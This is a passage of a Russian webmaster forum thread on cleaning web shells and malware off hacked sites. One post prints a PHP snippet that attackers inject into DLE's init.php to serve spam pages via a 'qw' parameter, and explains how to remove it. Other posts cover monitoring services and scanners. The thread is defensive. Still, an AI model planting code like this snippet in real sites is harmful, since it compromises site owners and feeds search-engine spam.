Общая тема о борьбе с шеллами и вирусами на сайте

Avatar 375
#271

Касаемо DLE

Бывает что взломают сайт и воткнут код в файлик engine/ini.php

если в поисковике видите кучу страниц вида ваш сайт/?qw=тут фигня.

значит надо удалять кусок кода, и искать вирус

Начинается зловред от

$_DOCUMENT_DATE = false;

$user_query = "";

и до строки

$js_array = array ();

все что между ним удаляем.

код


if(isset( $_GET['q'.'w']) ){
error_reporting(0);
$t = str_replace('..','',$_GET['q'.'w']);
if(strstr($t, ".xml")){
header('Content-Type: charset=windows-1251');
}else{
header('Content-Type: text/html; charset=windows-1251');
}
$html = file("/home/***/data/www/ваш сайт/engine/editor/jscripts/tiny_mce/plugins/удалите папку ваш сайт/$t");
foreach ($html as $key => $value) {
echo $value;
}
die;
}



В результате поисковик индексирует кучу страниц на сайте.

либо выдает агс

Может кому пригодится.

kukoin trade (https://t.me/kukoin_trade) vk (https://vk.com/bitcoindash) торгуй на фантики и учись (https://www.kucoin.com/?rcode=7vsvH3)
I1 33
#272

Есть сервисы которые мониторят файловую структуру сайта. Как только шелл зальют, тут же приходит письмо куда залили. Остается только удалить файл, или кусок кода. Ну и искать дыру, как залили.

K5 209
#273
воткнут код в файлик engine/ini.php

учитывая что изначально такого файлика в dle нет, должно насторожить сразу откуда он и что содержит.

P.S. не каждый же догадается, что имелся ввиду

/еngine/init.php
аська 45два48499два записки на работе (http://memoryhigh.ru) помогу с сайтом, удалю вирусы, настрою впс -> отзывы ТУТ (/ru/forum/836248) и ТАМ (http://www.maultalk.com/topic140187.html) !!!всегда проверяйте данные людей, которые сами пишут вам в аську или скайп!!!
Avatar 375
#274
kgtu5:
учитывая что изначально такого файлика в dle нет, должно насторожить сразу откуда он и что содержит.

P.S. не каждый же догадается, что имелся ввиду

Прошу прощения букву не дописал.

Имелось ввиду файл init.php

I 72
#275

(Есть сервисы которые мониторят файловую структуру сайта ) - адрес сервиса подскажите

I1 33
#276

Вот например: find-xss.net/monitoring

Avatar 167
#277

где шелл может жить в drupal-e?

Быстро едешь, тихо понесут... www.unitytrans.ru (www.unitytrans.ru)
R 179
Rxp
#278
vputi:
где шелл может жить в drupal-e?

В любом месте, нет обязательных мест, где он может находится.

Удаление вирусов с сайта, защита сайта, Гарантия! (/ru/forum/999073) -> топик на маулталк (http://www.maultalk.com/topic113834s0.html) -> Топик в сапе (http://forum.sape.ru/showthread.php?t=79363)
Avatar 112
#279

заюзал поиск по вхождению во всех файлах и нашлось вот такое:

Только я не могу понять в каком это файле, линукс не вернул название файла.

что это за фигня такая?

Прошелся Web Shell Detector , он не нашел этот код нигде.

Avatar 92
#280

Ребят, такой вопрос, на сайте 2ip.ru/site-virus-scaner/ показывает что яндекс видит вирус http://joxi.ru/823jNpMczkZ7mO , а в панели вебмастера вируса нет. Как быть? Раньше в панели вебмастера яндекса было видно, что есть вирус, убирал рекламу, отправлял на перепроверку и вирус уходил... А теперь что делать?

Хорошо работают с мобильным трафом клик (http://u.to/hSXlDA).

Авторизуйтесь или зарегистрируйтесь, чтобы оставить комментарий